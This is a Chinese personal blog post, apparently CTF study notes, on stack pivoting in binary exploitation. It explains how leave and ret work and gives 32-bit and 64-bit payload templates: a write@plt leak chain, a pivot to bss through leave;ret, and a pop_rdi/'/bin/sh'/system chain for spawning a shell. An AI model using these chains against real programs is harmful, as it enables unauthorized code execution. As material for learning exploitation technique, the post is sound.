<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.0.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/safari-pinned-tab.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="每条指令的作用：  push eip+4;  这条指令将当前指令指针寄存器（eip）加上 4 的值压入栈中。这里的 eip+4 实际上是下一条指令的地址（假设没有其他的分支跳转或中断），因为 eip 指向当前正在执行的指令的地址。这样做通常是为了将返回地址（即函数调用指令的下一条指令地址）保存到栈中，以便函数调用完成后可以正确地返回。   push ebp;  这条指令将当前基指针寄存器（ebp）">
<meta property="og:type" content="article">
<meta property="og:title" content="栈迁移">
<meta property="og:url" content="http://example.com/2024/10/08/%E6%A0%88%E8%BF%81%E7%A7%BB/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="每条指令的作用：  push eip+4;  这条指令将当前指令指针寄存器（eip）加上 4 的值压入栈中。这里的 eip+4 实际上是下一条指令的地址（假设没有其他的分支跳转或中断），因为 eip 指向当前正在执行的指令的地址。这样做通常是为了将返回地址（即函数调用指令的下一条指令地址）保存到栈中，以便函数调用完成后可以正确地返回。   push ebp;  这条指令将当前基指针寄存器（ebp）">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="c:\111Blog\myBlog\source_posts\%E6%A0%88%E8%BF%81%E7%A7%BB\8.png">
<meta property="article:published_time" content="2024-10-08T07:02:17.000Z">
<meta property="article:modified_time" content="2024-10-21T13:59:41.376Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="c:\111Blog\myBlog\source_posts\%E6%A0%88%E8%BF%81%E7%A7%BB\8.png">

<link rel="canonical" href="http://example.com/2024/10/08/%E6%A0%88%E8%BF%81%E7%A7%BB/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>栈迁移 | Hexo</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Hexo</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2024/10/08/%E6%A0%88%E8%BF%81%E7%A7%BB/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="John Doe">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hexo">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          栈迁移
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2024-10-08 15:02:17" itemprop="dateCreated datePublished" datetime="2024-10-08T15:02:17+08:00">2024-10-08</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2024-10-21 21:59:41" itemprop="dateModified" datetime="2024-10-21T21:59:41+08:00">2024-10-21</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>每条指令的作用：</p>
<ol>
<li><p><code>push eip+4;</code></p>
<ul>
<li>这条指令将当前指令指针寄存器（<code>eip</code>）加上 4 的值压入栈中。这里的 <code>eip+4</code> 实际上是下一条指令的地址（假设没有其他的分支跳转或中断），因为 <code>eip</code> 指向当前正在执行的指令的地址。这样做通常是为了将返回地址（即函数调用指令的下一条指令地址）保存到栈中，以便函数调用完成后可以正确地返回。</li>
</ul>
</li>
<li><p><code>push ebp;</code></p>
<ul>
<li>这条指令将当前基指针寄存器（<code>ebp</code>）的值压入栈中。<code>ebp</code> 通常用于指向当前栈帧的基址，因此将其值保存下来是为了在函数调用完成后能够恢复到调用函数之前的栈帧状态。</li>
</ul>
</li>
<li><p><code>mov ebp, esp;</code></p>
<ul>
<li>这条指令将栈指针寄存器（<code>esp</code>）的值复制到基指针寄存器（<code>ebp</code>）。这意味着函数的栈帧基址现在被设置为当前栈顶的位置。之后，函数可以通过 <code>ebp</code> 寄存器访问其局部变量和参数。</li>
</ul>
</li>
</ol>
<p>这段代码的整体作用是设置一个新的栈帧，使得函数可以在其局部变量和参数上进行操作，同时保留调用函数前的栈帧状态，以便在函数返回时能够恢复原始状态。</p>
<p>主要通过两次leave ret指令得到目的，最主要是要得到ebp值也就是栈底的地址，来更精确地进行两次leave，第一次的leave是输入后的自带leave，第二次的leave是我们自己导入的leave，做完之后就按着输入顺序一一调取按顺序进行。之后执行之前相当于一串函数，执行ret gift</p>
<p>​																												main</p>
<p>的操作，执行gitf时进行压栈，rsp下移到main，gift结束时执行main。</p>
<p>32位模板：</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">payload1 = p32(write_plt_addr) + p32(main_addr) + p32(<span class="number">1</span>) //<span class="comment">#此前为需要执行的命令</span></span><br><span class="line">     + p32(write_got_addr) + p32(<span class="number">4</span>)//<span class="comment">#此为必要的，一为返回的地址，二为</span></span><br><span class="line"></span><br><span class="line">payload2 = offset*<span class="string">&#x27;a&#x27;</span> + p32(bss_addr-<span class="number">4</span>) + p32(leave_ret_addr)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>64位模板（仅参考）：</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">payload=(p64(gift)+p64(main)).ljust(<span class="number">0x30</span>,<span class="string">b&#x27;\x00&#x27;</span>)<span class="comment"># 依次是需要执行的命令进行ret2libc</span></span><br><span class="line">payload+=p64(leak-<span class="number">0X8</span>)+p64(leave_ret)<span class="comment">#一为stack栈底地址，二位二次leave的命令地址 </span></span><br><span class="line">本题存在libc 所以每次ebp值不同</span><br><span class="line">payload1=(p64(pop_rdi)+p64(bin_sh_addr)+p64(system_addr)).ljust(<span class="number">0x30</span>,<span class="string">b&#x27;a&#x27;</span>)<span class="comment">#p64执行获取shell步骤</span></span><br><span class="line">payload1+=p64(leak2-<span class="number">0x8</span>)+p64(leave_ret)<span class="comment">#一为stack栈底地址，二位二次leave的命令地址 之前依次是需要执行的命令进行getshell 若leak2的值不减去0x8 会导致第一个地址的命令无法执行</span></span><br></pre></td></tr></table></figure>

<p><img src="C:\111Blog\myBlog\source_posts\栈迁移\8.png" alt="8"></p>
<p>rbp&#x3D;gift 图误</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">leave=mov esp,ebp;  pop ebp;</span><br><span class="line">ret =pop eip <span class="comment">#弹出栈顶数据（rsp中的）给eip寄存器 rsp会上升8/4地址</span></span><br></pre></td></tr></table></figure>


    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2024/10/08/%E6%A0%88%E6%BA%A2%E5%87%BA%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86-1/" rel="prev" title="栈溢出基础知识-1">
      <i class="fa fa-chevron-left"></i> 栈溢出基础知识-1
    </a></div>
      <div class="post-nav-item">
    <a href="/2024/10/08/%E6%A0%88%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%862/" rel="next" title="栈基础知识2">
      栈基础知识2 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">John Doe</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">44</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">John Doe</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
